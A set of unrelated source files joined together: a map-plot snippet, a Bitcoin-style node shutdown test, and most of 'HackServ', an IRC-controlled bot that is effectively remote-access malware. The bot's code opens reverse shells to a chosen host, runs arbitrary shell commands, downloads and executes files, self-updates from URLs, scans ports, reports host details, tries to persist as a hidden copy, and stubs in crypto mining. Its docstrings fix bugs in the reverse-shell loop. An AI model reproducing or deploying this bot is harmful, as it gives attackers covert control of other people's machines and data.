    r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
                                args=params,
                                details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
    return r
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test emircoind shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
    """Issue a long-blocking RPC; runs in a helper thread (see run_test).

    `waitfornewblock` blocks server-side until a new block arrives or the
    node shuts down; on the clean chain it returns the genesis height 0.
    """
    block = node.waitfornewblock()
    assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
    """Check that the node shuts down cleanly while an RPC is in flight."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1

    def run_test(self):
        # Dedicated proxy with a long timeout: the waitfornewblock issued by
        # the helper thread blocks server-side until shutdown.
        node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        node.getblockcount()
        Thread(target=test_long_call, args=(node,)).start()
        # Wait until the server is executing the above `waitfornewblock`
        # (2 active commands: getrpcinfo itself plus the blocked call).
        wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)
if __name__ == '__main__':
    # Framework entry point: parses CLI options, sets up nodes, runs run_test.
    ShutdownTest().main()
|
hackserv.py | #!/usr/bin/env python3
#
# HackServ IRC Bot
# hackserv.py
#
# Copyright (c) 2018-2021 Stephen Harris <trackmastersteve@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Bot metadata, surfaced in CTCP VERSION replies and status output.
legal_notice = 'THIS BOT IS FOR EDUCATION PURPOSES ONLY! DO NOT USE IT FOR MALICIOUS INTENT!'
author = 'Stephen Harris (trackmastersteve@gmail.com)'
github = 'https://github.com/trackmastersteve/hackserv.git'
software = 'HackServ'
version = '1.3.3'
last_modification = '2021.06.10'
# Imports
import os
import ssl
import sys
import stat
import nmap
import time
import uuid
import shlex
import shutil
import base64
import random
import socket
import datetime
import platform
import threading
import subprocess
import urllib.request
from requests import get
starttime = datetime.datetime.utcnow() # Start time is used to calculate uptime.
ip = get('https://api.ipify.org').text # Get public IP address. (used to set botnick-to-ip as well as the '.ip' command.)
sys.path.insert(0, '/usr/local/bin/') # Working directory.
from hsConfig import * # import the hsConfig.py file (server, port, channel, botnick, adminname, debug/SASL flags, ...).
lastping = time.time() # Time at last PING.
threshold = 200 # Ping timeout before reconnect.
ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set ircsock variable.
if usessl: # If SSL is True, connect using SSL.
    ircsock = ssl.wrap_socket(ircsock)
ircsock.settimeout(240) # Set socket timeout.
connected = False # Variable to say if bot is connected or not.
def ircsend(msg):
    """Append a newline to msg, encode it as UTF-8 and send it to the server."""
    line = str(msg) + "\n"
    ircsock.send(line.encode("UTF-8"))
def connect(): # Connect to the IRC network.
    """Establish the initial IRC connection, then hand off to main().

    Note that main() runs *inside* this call, so connect() only returns
    when the bot stops.  On failure it waits 10 seconds and falls back to
    reconnect().
    """
    global connected
    while not connected:
        try: # Try and connect to the IRC server.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("Connecting to " + str(server) + ":" + str(port))
            ircsock.connect_ex((server, port)) # Here we connect to the server.
            if usesasl:
                ircsend("CAP REQ :sasl") # Request SASL Authentication.
                if debugmode:
                    print("Requesting SASL login.")
            if useservpass: # If useservpass is True, send serverpass to server to connect.
                ircsend("PASS "+ serverpass) # Send the server password to connect to password protected IRC server.
            ircsend("USER "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick+ " "+ botnick) # We are basically filling out a form with this line and saying to set all the fields to the bot nickname.
            ircsend("NICK "+ botnick) # Assign the nick to the bot.
            connected = True
            main()
        except Exception as iconnex: # If you can't connect, wait 10 seconds and try again.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("Exception: " + str(iconnex))
                print("Failed to connect to " + str(server) + ":" + str(port) + ". Retrying in 10 seconds...")
            connected = False
            time.sleep(10)
            reconnect()
def reconnect(): # Reconnect to the IRC network.
    """Tear down the old socket and re-run the connection handshake.

    Mirrors connect() but rebuilds ircsock first; like connect(), main()
    runs inside this call.
    """
    global connected # Set 'connected' variable
    global ircsock # Set 'ircsock' variable
    while not connected:
        ircsock.close() # Close previous socket.
        ircsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set ircsock variable.
        if usessl: # If SSL is True, connect using SSL.
            ircsock = ssl.wrap_socket(ircsock)
        try:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("Reconnecting to " + str(server) + ":" + str(port))
            ircsock.connect_ex((server, port)) # Here we connect to the server.
            if usesasl:
                ircsend("CAP REQ :sasl") # Request SASL Authentication.
                if debugmode:
                    print("Requesting SASL login.")
            if useservpass: # If useservpass is True, send serverpass to server to connect.
                ircsend("PASS "+ serverpass) # Send the server password to connect to password protected IRC server.
            ircsend("USER "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick +" "+ botnick) # We are basically filling out a form with this line and saying to set all the fields to the bot nickname.
            ircsend("NICK "+ botnick) # Assign the nick to the bot.
            connected = True
            main()
        except Exception as irconnex: # If you can't connect, wait 10 seconds and try again.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("Exception: " + str(irconnex))
                print("Failed to reconnect to " + str(server) + ":" + str(port) + ". Retrying in 10 seconds...")
            connected = False
            time.sleep(10)
            reconnect()
def joinchan(chan): # Join channel(s).
    """JOIN a channel and pump socket messages until the NAMES list ends,
    so the join burst is consumed before main()'s message loop resumes."""
    ircsend("JOIN "+ chan)
    ircmsg = ""
    while ircmsg.find("End of /NAMES list.") == -1:
        ircmsg = ircsock.recv(2048).decode("UTF-8")
        ircmsg = ircmsg.strip('\n\r')
        if debugmode: # If debugmode is True, msgs will print to screen.
            print(ircmsg) # Print messages to the screen. (won't allow bot to run in the background.)
def partchan(chan):
    """Leave the given channel."""
    ircsend("PART " + chan)
def pjchan(chan):
    """Cycle a channel: part it and immediately rejoin."""
    for verb in ("PART ", "JOIN "):
        ircsend(verb + chan)
def newnick(newnick):
    """Change the bot's nickname to `newnick`."""
    ircsend("NICK " + newnick)
def sendmsg(msg, target=channel):
    """PRIVMSG `msg` to `target` (defaults to the configured channel)."""
    ircsend("PRIVMSG " + target + " :" + msg)
def sendntc(ntc, target=channel):
    """Send a NOTICE `ntc` to `target` (defaults to the configured channel)."""
    ircsend("NOTICE " + target + " :" + ntc)
def sendversion(nick, ver): # Respond to VERSION request.
    """CTCP VERSION reply: report software name, version and the repo link.

    BUG FIX: the original overwrote the `ver` argument with the module-level
    `version` constant, making the parameter dead.  The argument is now
    honoured; existing callers pass `version`, so the reply is unchanged.
    """
    reply = "VERSION " + software + ' ' + ver + ' Download it at: ' + github
    sendntc(reply, nick)
def kick(msg, usr, chan):
    """KICK user `usr` from channel `chan`, citing `msg` as the reason."""
    ircsend("KICK " + chan + " " + usr + " :" + msg)
def uptime():
    """Return the bot's uptime as a timedelta rounded to whole seconds."""
    elapsed_seconds = (datetime.datetime.utcnow() - starttime).total_seconds()
    return datetime.timedelta(seconds=round(elapsed_seconds))
def uname():
    """Return platform.uname(): system, node, release, version, machine."""
    return platform.uname()
def username():
    """Return the OS login name: $USER, then $USERNAME, then 'user'."""
    return os.getenv('USER', os.getenv('USERNAME', 'user'))
def guid():
    """Return the numeric uid of the account running the bot."""
    return os.getuid()
def macaddress(): # Used to get macaddress for .macaddress command.
    """Return the primary interface's MAC address as 'AA:BB:CC:DD:EE:FF'.

    BUG FIX: the original formatted with hex()/strip('0x'), but str.strip
    removes *any* leading/trailing '0'/'x' characters and hex() drops
    leading zeros, so MACs with zero bytes at either end were mangled.
    Zero-padding the node id to 12 hex digits is always correct.
    """
    mac_hex = format(uuid.getnode(), '012x')
    return ':'.join(mac_hex[i:i + 2] for i in range(0, 12, 2)).upper()
def linuxMemory(): # Get linux system memory info for .memory command.
    """NOTICE the first two lines of /proc/meminfo (MemTotal, MemFree) to
    the admin.  Linux-only; relies on the procfs layout."""
    sendntc("Memory Info: ", adminname)
    with open("/proc/meminfo", "r") as f:
        lines = f.readlines()
        sendntc(" " + lines[0].strip(), adminname)
        sendntc(" " + lines[1].strip(), adminname)
def nmapScan(tgtHost, tgtPort): # Use nmap to scan ports on an ip address with .scan command
    """Scan one TCP port on tgtHost via python-nmap and report the state to
    the admin: '[+]' prefix when open, '[-]' otherwise."""
    nmScan = nmap.PortScanner()
    nmScan.scan(tgtHost, tgtPort)
    state = nmScan[tgtHost]['tcp'][int(tgtPort)]['state']
    if state == 'open':
        st = '[+]'
    else:
        st = '[-]'
    sendmsg((st + " " + tgtHost + " tcp/" +tgtPort + " -" + state), adminname)
def rShell(rsHost, rsPort): # Open a reverse shell on this device.
    """Connect out to rsHost:rsPort and execute commands received there,
    streaming each command's output back over the same socket.

    Special commands: 'quit'/'exit' close the connection; 'cd <dir>'
    changes the working directory.  Everything else runs via the shell.

    BUG FIX: the original tested `data == "quit" or "exit"`, which is
    always truthy, so the socket was closed on every received command and
    the session died after one message.  Only an explicit quit/exit now
    closes the session (and the loop exits instead of reusing the closed
    socket).
    """
    try:
        rs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        rs.connect_ex((str(rsHost), int(rsPort)))
        rs.sendto(str.encode("[+] Connection established!"), (str(rsHost), int(rsPort)))
        rsConnected = True
        if debugmode: # If debugmode is True, msgs will print to screen.
            print("[+] Connection established with " + rsHost + ":" + rsPort + "!")
        while rsConnected:
            try:
                data = rs.recv(1024).decode("UTF-8")
                if data in ("quit", "exit"):
                    rs.close()
                    sendntc("[x] Closed reverse shell connection with "+ rsHost +":"+ rsPort +"!", adminname)
                    if debugmode:
                        print("[x] Closed reverse shell connection with "+ rsHost +":"+ rsPort +"!")
                    rsConnected = False
                    break
                if data[:2] == "cd":
                    os.chdir(data[3:])
                if len(data) > 0:
                    sproc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    stdout_value = sproc.stdout.read() + sproc.stderr.read()
                    output_str = str(stdout_value, "UTF-8")
                    currentWD = os.getcwd() + "> "
                    rs.sendto(str.encode(currentWD + output_str), (str(rsHost), int(rsPort)))
            except Exception as rsex:
                if debugmode:
                    print("rShell Exception: " + str(rsex))
                rsConnected = False
    except Exception as rsconnex:
        if debugmode: # If debugmode is True, msgs will print to screen.
            print("rShell Socket Connection Exception: " + str(rsconnex))
        rs.close()
def runcmd(sc): # Run shell commands on this device.
    """Run a command on this device, relaying each output line to the admin
    as a NOTICE, and 'Shell>' when the command finishes.

    BUG FIX: the original combined shlex.split(sc) with shell=True; on
    POSIX that executes only the first token (the rest become shell
    arguments).  Splitting with shell=False runs the full command line and
    avoids shell injection.  The original also had unreachable statements
    after the read loop (the loop only exits via `return`), one of which
    passed an int to sendntc and would have raised TypeError; they are
    removed.
    """
    proc = subprocess.Popen(shlex.split(sc), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    while True:
        line = proc.stdout.readline()
        line_str = str(line, "UTF-8")
        if line == b'' and proc.poll() is not None:
            # EOF and the process has exited: signal completion.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("End of .cmd output.")
            sendntc("Shell>", adminname)
            return
        if line:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print(format(line_str))
            sendntc("Shell> " + format(line_str), adminname)
def runcmd_noout(sc): # Run shell commands without any feedback output.
    # Fire-and-forget: stdout/stderr are attached to pipes that are never
    # read, so output is discarded (and very chatty commands could block on
    # a full pipe buffer).
    proc = subprocess.Popen(sc, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
def setmode(flag, target=channel):
    """Set a MODE flag on a nick or channel (defaults to the channel)."""
    ircsend("MODE " + target + " " + flag)
def download(link, file): # Download a file.
    """Fetch `link` to local path `file` and notify the admin.

    NOTE(review): the `file` parameter shadows a builtin name (kept for
    interface stability).
    """
    urllib.request.urlretrieve(str(link), str(file))
    sendntc(str(file) +" was successfully downloaded from "+ str(link) +"!", adminname)
def execute(xType, file): # Run executable file.
    """Run an executable file by one of three mechanisms.

    xType -- 'ex'  : exec() the file's contents as Python source;
             'sys' : run the file via os.system;
             other : run './<file>' via runcmd_noout.

    BUG FIX: the original tested `type == 'sys'` (the builtin `type`, never
    equal to a string), so the 'sys' branch was dead and every non-'sys'
    value fell into the else branch -- 'ex' calls even executed the file
    twice.  An if/elif/else chain on xType restores the intended dispatch.
    """
    if xType == 'ex':
        exec(open(str(file)).read())
    elif xType == 'sys':
        os.system(str(file))
    else:
        runcmd_noout('./' + file)
def chFileMod(modFile, modType): # Change the file permissions. (chmod)
    """chmod `modFile` to mode `modType` (e.g. 0o755) and notify the admin."""
    os.chmod(str(modFile), modType)
    sendntc(str(modFile) +" mode was changed to: "+ str(modType) +"!", adminname)
def update(link, dlFile): # Update bot.
    """Self-update: download dlFile from link, back up the running script,
    swap the new file in, notify the admin, then re-exec the bot.

    BUG FIX: the original sent the success NOTICE *after* os.execv, which
    replaces the process and never returns, so the notice was dead code;
    it is now sent before re-executing.
    """
    if debugmode: # If debugmode is True, msgs will print to screen.
        print("[==>] Downloading update file: "+ str(dlFile))
    download(link, dlFile) # Download the updated file.
    if debugmode: # If debugmode is True, msgs will print to screen.
        print("[chmod +x] Making "+ str(dlFile) +" executable!")
    chFileMod(dlFile, 0o755) # Make the file executable.
    if debugmode: # If debugmode is True, msgs will print to screen.
        print("[<==] Backing up old hackserv.py and renaming "+ str(dlFile) +" to hackserv.py")
    os.rename("hackserv.py", "hackserv.py.bak") # Backup the original 'hackserv.py' file.
    os.rename(str(dlFile), "hackserv.py") # Rename the new file to 'hackserv.py'
    sendntc("[*] Success! "+ str(dlFile) +" was renamed and old 'hackserv.py' was successsfully backed up and updated!", adminname)
    if debugmode: # If debugmode is True, msgs will print to screen.
        print("[+] Restarting hackserv.py!")
    os.execv(__file__, sys.argv) # Replaces this process; never returns.
def retrieveFile(fsname, fs, fsaddr): # Receive a file.
    """Serve one file-download request on connection `fs`.

    Protocol: read the requested filename; reply "EXISTS <size>" if the
    file is present; on an "OK" confirmation stream the file in 1024-byte
    chunks; reply "ERR" for missing files.  `fsname` is an unused thread
    label kept for interface compatibility with fileServer().

    BUG FIX: the original loop condition compared bytes to str
    (`bytesToSend != ""`), which is always True in Python 3, so EOF was
    never detected and the sender looped forever; testing truthiness of
    the bytes chunk ends the loop at EOF.
    """
    filename = fs.recv(1024).decode("UTF-8")
    if os.path.isfile(filename):
        fs.sendto(str.encode("EXISTS " + str(os.path.getsize(filename))), fsaddr)
        userResponse = fs.recv(1024).decode("UTF-8")
        if userResponse[:2] == 'OK':
            with open(filename, 'rb') as f:
                bytesToSend = f.read(1024)
                while bytesToSend:
                    fs.sendto(bytesToSend, fsaddr)
                    bytesToSend = f.read(1024)
    else:
        fs.sendto(str.encode("ERR"), fsaddr)
    fs.close()
def fileServer(): # Open a file server on this device.
    """Listen on 127.0.0.1:4444 and serve file downloads; each accepted
    client is handled by retrieveFile() in its own thread.

    NOTE(review): the accept loop never exits, so the s.close() after it is
    unreachable.
    """
    host = '127.0.0.1'
    port = 4444
    s = socket.socket()
    s.bind((host, port))
    s.listen(5)
    if debugmode: # If debugmode is True, msgs will print to screen.
        print("[*] File Server (Download) started!")
    sendntc("[*] File Server (Download) started!", adminname)
    while True:
        c, addr = s.accept()
        if debugmode: # If debugmode is True, msgs will print to screen.
            print("[+] Client connected ip: " + str(addr))
        sendntc("[+] Client connected ip: " + str(addr), adminname)
        t = threading.Thread(target=retrieveFile, args=("retreiveThread", c, addr))
        t.start()
    s.close()
def fileList(dir): # List files in current directory
    """Walk `dir` bottom-up and NOTICE every file path, then every
    directory path, to the admin -- one per second to avoid flooding the
    IRC server.  Also chdirs into `dir` as a side effect.

    NOTE(review): the `dir` parameter shadows a builtin name (kept for
    interface stability).
    """
    os.chdir(dir)
    for root, dirs, files in os.walk(dir, topdown = False): # walk through current directory.
        for name in files:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print(os.path.join(root, name)) # Print the file list to screen if debugmode is enabled.
            sendntc(os.path.join(root, name), adminname)
            time.sleep(1)
        for name in dirs:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print(os.path.join(root, name)) # Print the dir list to screen if debugmode is enabled.
            sendntc(os.path.join(root, name), adminname)
            time.sleep(1)
def bgMining():
    """Placeholder for background crypto-mining (not implemented).

    BUG FIX: the original sent the notice to `name`, which is not defined
    in this scope and raised NameError; the notice is intended for the
    admin, matching the other status notices in this file.
    """
    if debugmode:
        print("bgMining started!")
    sendntc("This does nothing, yet!", adminname)
def nonExist(command, name):
    """Tell `name` that `command` is unimplemented, pointing at the repo."""
    errorMessage = ("{0} does not exist yet. Please go to {1} "
                    "if you feel like you can contribute.").format(command, github)
    if debugmode:
        print(errorMessage)
    sendntc(errorMessage, name)
def persistence():
    # Startup Check. (Still in testing!)
    """Try to keep a copy of the bot in a well-known location, then start
    (or clone-and-start) it.

    NOTE(review): several issues to confirm/fix before relying on this:
      * `__name__` is the module name ('__main__' when run directly), not a
        file path, so the name/clone comparison below can never match.
      * os.getuid() returns an int, so `== 'root'` is always False (should
        presumably be `== 0`).
      * shutil.copyfile requires a destination *file* path, not the
        directory '/usr/local/bin/'.
    """
    name = str(__name__) # Get filename.
    hd = str(os.path.expanduser('~')) # Get path to home directory.
    hdPath = str(os.getcwd()) # Get current working directory.
    clone = hdPath + '/.hackserv.py' # Set clone name as .hackserv.py in current working directory.
    if name == clone:
        if debugmode: # If debugmode is True, msgs will print to screen.
            print(name + " and "+ clone + " are the same file!")
        connect()
    else:
        try:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("NAME: " + name) # Current filename.
                print("CLONE: " + clone) # Cloned filename.
                print("HOME DIR: " + hd) # Home directory location.
            #if os.path.isdir(hdPath) and os.path.exists(hdPath):
                #if debugmode: # If debugmode is True, msgs will print to screen.
                    #print("Directory Exists: " + hdPath)
            #else:
                #if debugmode: # If debugmode is True, msgs will print to screen.
                    #print("Creating Directory: " + hdPath)
                #os.mkdir(hdPath)#, 0700)
            if os.path.isfile(clone):
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Bot File Exists: " + clone)
                # need to run clone instead
            else:
                if name != clone:
                    # Need to check root permissions to copy to /usr/local/bin/.
                    if os.getuid() == 'root':
                        shutil.copyfile(name, '/usr/local/bin/')
                    else:
                        if debugmode: # If debugmode is True, msgs will print to screen.
                            print("Copying " + name + " to: " + clone)
                        shutil.copyfile(name, clone)
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Running: " + clone)
                runcmd(clone)
                #os.system(clone)
        except OSError as mdr:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("ERROR: " + str(mdr))
def main(): # This is the main function for all of the bot controls.
    """Receive/dispatch loop of the bot.

    While ``connected`` is True, read raw lines from the IRC socket and
    dispatch on their content: SASL handshake replies, server NOTICEs,
    CTCP VERSION, channel JOINs, admin '.'-commands inside PRIVMSGs, and
    PING keepalives.  Relies on module-level configuration and helpers
    (ircsock, debugmode, usesasl, nickserv, nspass, adminname, channel,
    exitcode, threshold, sendmsg, sendntc, ircsend, connect, reconnect,
    ...) defined elsewhere in this file.
    """
    global connected
    global botnick
    global ip
    global lastping
    while connected:
        ircmsg = ircsock.recv(2048).decode("UTF-8")
        ircmsg = ircmsg.strip('\n\r')
        if debugmode: # If debugmode is True, msgs will print to screen.
            print(ircmsg) # Print messages to the screen. (won't allow bot to run in the background.)
        # SASL Authentication.
        if ircmsg.find("ACK :sasl") != -1:
            if usesasl:
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Authenticating with SASL PLAIN.") # Request PLAIN Auth.
                ircsend("AUTHENTICATE PLAIN")
        if ircmsg.find("AUTHENTICATE +") != -1:
            if usesasl:
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Sending %s Password: %s to SASL." % (nickserv, nspass))
                # SASL PLAIN payload is authzid NUL authcid NUL password, base64-encoded.
                authpass = botnick + '\x00' + botnick + '\x00' + nspass
                ap_encoded = str(base64.b64encode(authpass.encode("UTF-8")), "UTF-8")
                ircsend("AUTHENTICATE " + ap_encoded) # Authenticate with SASL.
        if ircmsg.find("SASL authentication successful") != -1:
            if usesasl:
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Sending CAP END command.")
                ircsend("CAP END") # End the SASL Authentication.
        # Wait 30 seconds and try to reconnect if 'too many connections from this IP'
        if ircmsg.find('Too many connections from your IP') != -1:
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("Too many connections from this IP! Reconnecting in 30 seconds...")
            connected = False
            time.sleep(30)
            reconnect()
        # Change nickname if current nickname is already in use.
        if ircmsg.find('Nickname is already in use') != -1:
            botnick = "hs[" + str(random.randint(10000,99999)) +"]"
            newnick(botnick)
        # Join 'channel' and msg 'admin' after you are fully connected to server.
        if ircmsg.find('NOTICE') != -1:
            name = ircmsg.split('!',1)[0][1:]
            message = ircmsg.split('NOTICE',1)[1].split(':',1)[1]
            if message.find('*** You are connected') != -1:
                #sendmsg("IDENTIFY %s" % nspass, nickserv)
                joinchan(channel)
                sendntc(format(ip) + " Online!", adminname)
            # Respond to 'PONG ERROR' message from server.
            if message.find('ERROR') != -1:
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Received a 'ERROR' from the server, reconnecting in 5 seconds...")
                connected = False
                time.sleep(5)
                reconnect()
            # Respond to NickServ ident request.
            if name.lower() == nickserv.lower() and message.find('This nickname is registered') != -1:
                sendmsg("IDENTIFY " + nspass, nickserv)
        # Respond to CTCP VERSION.
        if ircmsg.find('VERSION') != -1:
            name = ircmsg.split('!',1)[0][1:]
            vers = version
            sendversion(name, vers)
        # Things to do when a user joins the channel.
        if ircmsg.find('JOIN') != -1:
            name = ircmsg.split('!',1)[0][1:] # Username
            message = ircmsg.split('JOIN',1)[1].split(':',1)[1] # Channel
            ipHost = ircmsg.split('JOIN',1)[0] #IP Address or Hostname
            if len(name) < 17:
                if message.find(channel) != -1:
                    if onJoin: # must have onJoin = True in hsConfig.
                        #ircsend("DNS "+ name) # Attempt to get users IP address using DNS from IRC Server. (Commented out due to Oper requirements on most servers.)
                        sendntc('User: '+ name +' Hostname: '+ ipHost +' Joined: '+ message, adminname)
        # Messages come in from IRC in the format of: ":[Nick]!~[hostname]@[IPAddress]PRIVMSG[channel]:[message]"
        if ircmsg.find('PRIVMSG') != -1:
            name = ircmsg.split('!',1)[0][1:]
            message = ircmsg.split('PRIVMSG',1)[1].split(':',1)[1]
            # IRC Nicks are normally less than 17 characters long.
            if len(name) < 17:
                # Respond to anyone saying 'Hi [botnick]'.
                if message.find('Hi ' + botnick) != -1:
                    sendntc("Hello " + name + "!", name)
                # Respond to '.msg [target] [message]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.msg') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        message = target.split(' ', 1)[1]
                        target = target.split(' ')[0]
                    else:
                        target = name
                        message = "Could not parse. The message should be in format of '.msg [target] [message]' to work properly."
                    sendmsg(message, target)
                # Respond to '.ntc [target] [message]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.ntc') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        message = target.split(' ', 1)[1]
                        target = target.split(' ')[0]
                    else:
                        target = name
                        message = "Could not parse. The message should be in the format of '.notice [target] [message]' to work properly."
                    sendntc(message, target)
                # Respond to '.kick [channel] [nick] [reason]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.kick') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        reason = target.split(' ', 2)[2]
                        nick = target.split(' ')[1]
                        chnl = target.split(' ')[0]
                        message = nick + " was kicked from " + chnl + " Reason:" + reason
                        kick(reason, nick, chnl)
                    else:
                        message = "Could not parse. The message should be in the format of '.kick [#channel] [nick] [reason]' to work properly."
                    sendntc(message, name)
                # Respond to the '.mode [target] [mode]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.mode') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        mode = target.split(' ', 1)[1]
                        target = target.split(' ')[0]
                        message = "Setting mode " + mode + " on " + target + "!"
                        setmode(mode, target)
                    else:
                        message = "Could not parse. The message should be in the format of '.mode [target] [mode]' to work properly."
                    sendntc(message, adminname)
                # Respond to the '.dl [url] [file]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.dl') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        download_file = target.split(' ', 1)[1]
                        download_url = target.split(' ')[0]
                        message = "The file " + download_file + " is downloading from " + download_url + "..."
                        # Download in a thread so the receive loop keeps servicing PINGs.
                        download_thread = threading.Thread(target=download, args=(download_url, download_file))
                        download_thread.start()
                    else:
                        message = "Could not parse. The message should be in the format of '.dl [url] [file]' to work properly."
                    sendntc(message, adminname)
                # Respond to the '.run [execute type] [executable file]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.run') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        # FIX: parse type/file from `target` (the text after '.run'),
                        # not from `message` -- the old code always passed '.run'
                        # itself as the exec type.
                        exec_file = target.split(' ', 1)[1]
                        exec_type = target.split(' ')[0]
                        message = "Running the executable file: " + exec_file + " Using: " + exec_type
                        execute_thread = threading.Thread(target=execute, args=(exec_type, exec_file))
                        execute_thread.start()
                    else:
                        message = "Could not parse. The message should be in the format of '.run [exec type] [exec file]' to work properly."
                    sendntc(message, adminname)
                # Respond to the '.raw [command]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.raw') != -1:
                    # FIX: the old check `message.split(' ', 1)[1] != -1` was always
                    # True and raised IndexError on a bare '.raw'.
                    if message.find(' ') != -1:
                        rawc = message.split(' ', 1)[1]
                        message = "Sending '" + rawc + "' to the server!"
                        ircsend(rawc)
                    else:
                        message = "Could not parse. The message should be in the format of '.raw [command]' to work properly."
                    sendntc(message, adminname)
                # Respond to the '.nick [newnick]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.nick') != -1:
                    # FIX: same always-True / IndexError check as '.raw' above.
                    if message.find(' ') != -1:
                        botnick = message.split(' ', 1)[1]
                        message = "Ok, Changing my nick to: " + botnick
                        newnick(botnick)
                    else:
                        message = "Could not parse. Please make sure the command is in the format of '.nick [newnick]' to work properly."
                    sendntc(message, name)
                # Respond to the '.join [channel]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.join') != -1:
                    # FIX: guard against a bare '.join' (IndexError on split).
                    if message.find(' ') != -1 and message.split(' ', 1)[1].startswith('#'):
                        target = message.split(' ', 1)[1]
                        message = "Ok, I will join the channel: " + target
                        joinchan(target)
                    else:
                        message = "Could not parse. Please make sure the channel is in the format of '#channel'."
                    sendntc(message, name)
                # Respond to the '.part [channel]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.part') != -1:
                    if message.find(' ') != -1 and message.split(' ', 1)[1].startswith('#'):
                        target = message.split(' ', 1)[1]
                        message = "Ok, I will part the channel: " + target
                        partchan(target)
                    else:
                        message = "Could not parse. Please make sure the channel is in the format of '#channel'."
                    sendntc(message, name)
                # Respond to the '.pj [channel]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.pj') != -1:
                    if message.find(' ') != -1 and message.split(' ', 1)[1].startswith('#'):
                        target = message.split(' ', 1)[1]
                        message = "Ok, cycling " + target + " now!"
                        pjchan(target)
                    else:
                        message = "Could not parse. Please make sure the channel is in the format of '#channel'."
                    sendntc(message, name)
                # Respond to the '.help' command.
                if message.find('.help') != -1:
                    message = "End of Help."
                    if name.lower() == adminname.lower():
                        helpmsg = """
                        '.help' (shows this message),
                        '.username' (shows username of machine the bot is running on),
                        '.uptime' (shows bot uptime),
                        '.uname' (get 1-line system info),
                        '.sysinfo' (get formated system info),
                        '.osversion' (get OS version info),
                        '.memory' (get memory stats info),
                        '.ip' (get public ip address of bot),
                        '.macaddress' (get mac address info),
                        '.rsh [target] [port]' (opens reverse shell to target),
                        ....listener can be downloaded at https://github.com/trackmastersteve/shell.git,
                        '.cmd [shell command]' (run shell commands on the host),
                        '.cno [shell command]' (run shell commands without output),
                        '.chmd [file] [permissions]' (change permissions of a file),
